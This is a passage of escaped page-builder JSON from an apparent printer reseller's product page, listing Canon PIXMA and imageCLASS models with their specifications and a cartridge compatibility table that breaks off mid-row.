8.8ipm black \\/ 4.4ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct<\\/p><p>Recommended print volume: 50 - 200 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"189f9a2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"df0825f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"11\\\" ]<\\/span><\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"31\",\"right\":\"31\",\"bottom\":\"31\",\"left\":\"31\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"692b43d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a99e262\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS9570\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6a04479\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\",\"id\":2347}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ab42ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>A3 Wireless Photo Printer with Large 4.3\\u201d Touch-Screen and Auto Document Feeder<\\/p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless\\/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 80 - 300 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"657c5e2\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1c9048c\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS8270\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e5da999\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\",\"id\":2348}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8c06b04\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless Photo All-In-One with Large 4.3\\u201d Touch-Screen and Auto Duplex Printing<\\/p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.<\\/p><p>Available in Black, Red and White.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 30 - 100 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"89b9be8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center><\\/center><center><\\/center><center><\\/center><center><\\/center><center><\\/center><center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"11\",\"right\":\"11\",\"bottom\":\"11\",\"left\":\"11\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e19c5ed\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"48b8328\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"619d0d9\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G2010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b641ed3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\",\"id\":2349}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"cb6e9e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f95d9d7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ef95652\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"72caeea\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G4010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a96790\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/095399e7118a4e898b6df8c1808358de_g4010_03.png\",\"id\":2351}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"bc59f5a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost.<\\/p><p>Print, Scan, Copy and Fax<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49effc0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"79b85a4\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G1010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4266d0e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\",\"id\":2352}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"79cfa28\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Printer for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) \\/ 5.0ipm (colour)<\\/p><p>Photo Speed (4 x 6\\\"): 60sec. (borderless)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"23b0d26\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"137f63f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"28\",\"right\":\"28\",\"bottom\":\"28\",\"left\":\"28\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"35746a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9b7f21a\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G3010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b8c2962\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\",\"id\":2721}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ca1fadd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1ffb94f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"84b94b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"130ead1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Laser Printers :-\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"219f45c\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"39c2015\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ece285e\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1273d18\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\",\"id\":2724}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6b60692\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><h4 class=\\\"sub-title\\\">Compact with wireless connectivity<\\/h4><\\/div><p>Simple to operate and compact in size, the ideal choice for your printing needs.<\\/p><ul class=\\\"list-normal\\\"><li>Print<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>First Print Out Time (A4): Approx. 6.5 sec<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><li>Mobile Connectivity.<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f6acb91\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"001a8d3\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF269dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a672fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\",\"id\":2725}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"fb9d4fc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)<\\/strong><\\/p><\\/div><p>Enjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 28ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 5.2 sec<\\/li><li>Max. paper input capacity: 251 sheets<\\/li><li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1f6f8ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a880ac9\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF266dn\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d63382c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\",\"id\":2726}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"73a1481\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Mobile Printing and Network<\\/strong><\\/p><\\/div><p>Featuring Network printing and SEND technology, MF266dn is the productive choice for your business operations.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 28ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 5.2 sec<\\/li><li>Max. paper input capacity: 251 sheets<\\/li><li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0e45d15\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"04de22f\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"790e84e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\",\"id\":2727}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"880dc7e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges<\\/strong><\\/p><\\/div><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 6.5 sec<\\/li><li>Max. paper input capacity: Up to 150 sheets<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bdfedb6\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"55572b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"00c113d\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"77e13da\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\",\"id\":2728}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"2036878\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity<\\/strong><\\/p><\\/div><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 6.5 sec<\\/li><li>Max. paper input capacity: Up to 150 sheets<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cd5acb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7671e33\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d405a8d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\",\"id\":2730}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9ac8d27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact with wireless connectivity, bundled with 3 cartridges<\\/strong><\\/p><\\/div><p>Keep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.<\\/p><ul class=\\\"list-normal\\\"><li>Print<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>First Print Out Time (A4): Approx. 6.5 sec<\\/li><li>Print Resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><li>Mobile Printing<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98ff69a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9dc3933\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF525x\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bdbe9d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\",\"id\":2731}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"7b20d6b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p>Smarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 43ppm<\\/li><li>Recommended monthly print volume: 2,000 - 7,500 pages<\\/li><li>FPOT: 6.2secs. (A4)<\\/li><li>Max. paper input capacity: Up to 2,300 sheets<\\/li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f3b97a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ef6036c\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF426dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1e51740\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\",\"id\":2732}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ca5e93\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact 4-in-1 Black and White Multifunction for the smart business<\\/strong><\\/p><\\/div><p>With cutting-edge features, the MF426dw is set to boost work productivity in the modern office.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 38ppm<\\/li><li>Recommended monthly print volume: 750 - 4,000 pages<\\/li><li>FPOT: 5.5secs. (A4)<\\/li><li>Max. paper input capacity: Up to 900 sheets<\\/li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9f4fce1\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"45b0f85\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d249821\",\"elType\":\"widget\",\"settings\":{\"title\":\"Cartridge Printers :-\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2dd6823\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"d81a183\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62697a3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>imagePROGRAF PRO-500<\\/p><\\/td><td width=\\\"208\\\"><p>Maintenance Cartridge MC-20<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY iB4170<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5070<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5170<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5370<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td 